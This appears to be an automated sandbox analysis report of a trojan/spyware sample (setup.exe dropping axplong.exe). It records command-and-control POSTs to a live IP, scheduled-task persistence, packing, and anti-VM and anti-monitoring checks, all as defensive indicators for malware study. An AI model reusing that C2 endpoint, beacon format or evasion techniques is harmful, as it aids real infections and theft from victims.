Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 42 41 35 34 46 43 33 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFBA54FC3FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown DNS traffic detected: query: 15.164.165.52.in-addr.arpa replaycode: Name error (3)
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_0050BD60 InternetOpenW,InternetConnectA,HttpSendRequestA,InternetReadFile, 4_2_0050BD60
Source: global traffic DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: unknown HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: axplong.exe, 00000004.00000002.3321500762.00000000010DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.2
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.1
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000004.00000002.3321500762.00000000010AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php

System Summary

Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\axplong.job
Source: setup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: setup.exe Static PE information: Section: ZLIB complexity 0.9974508259536785
Source: setup.exe Static PE information: Section: aosdyjib ZLIB complexity 0.9943002053730018
Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9974508259536785
Source: axplong.exe.0.dr Static PE information: Section: aosdyjib ZLIB complexity 0.9943002053730018
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/3@1/1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: setup.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\user\Desktop\setup.exe
Source: unknown Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\setup.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: acgenral.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: samcli.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: msacm32.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32
Source: setup.exe Static file information: File size 1933312 > 1048576
Source: setup.exe Static PE information: Raw size of aosdyjib is bigger than: 0x100000 < 0x1a6400

Data Obfuscation

Source: C:\Users\user\Desktop\setup.exe Unpacked PE file: 0.2.setup.exe.190000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 4.2.axplong.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosdyjib:EW;ttauocqi:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: axplong.exe.0.dr Static PE information: real checksum: 0x1d8aa2 should be: 0x1dafb5
Source: setup.exe Static PE information: real checksum: 0x1d8aa2 should be: 0x1dafb5
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: aosdyjib
Source: setup.exe Static PE information: section name: ttauocqi
Source: setup.exe Static PE information: section name: .taggant
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: aosdyjib
Source: axplong.exe.0.dr Static PE information: section name: ttauocqi
Source: axplong.exe.0.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_0051D84C push ecx; ret 4_2_0051D85F
Source: setup.exe Static PE information: section name: entropy: 7.982355367742593
Source: setup.exe Static PE information: section name: aosdyjib entropy: 7.955301660952693
Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.982355367742593
Source: axplong.exe.0.dr Static PE information: section name: aosdyjib entropy: 7.955301660952693
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Boot Survival

Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\Desktop\setup.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 1FEA45 second address: 1FEA49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4704 second address: 3A470E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F47D8E4826Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A470E second address: 3A4715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4715 second address: 3A4723 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007F47D8E48266h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4859 second address: 3A485F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4A23 second address: 3A4A3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4BB3 second address: 3A4BCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4BCB second address: 3A4BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4BDA second address: 3A4BDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4BDE second address: 3A4BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4BEE second address: 3A4BF8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F47D8E3B0AEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4D50 second address: 3A4D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F47D8E48266h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4D5A second address: 3A4D60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4D60 second address: 3A4D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F47D8E48268h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4D6E second address: 3A4D9E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F47D8E3B0AAh 0x00000008 jng 00007F47D8E3B0A6h 0x0000000e pop edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F47D8E3B0B0h 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push esi 0x0000001b push edi 0x0000001c push edi 0x0000001d pop edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4D9E second address: 3A4DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4DA7 second address: 3A4DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A4DAD second address: 3A4DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A507C second address: 3A5089 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 3A51F2 second address: 3A520A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48274h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
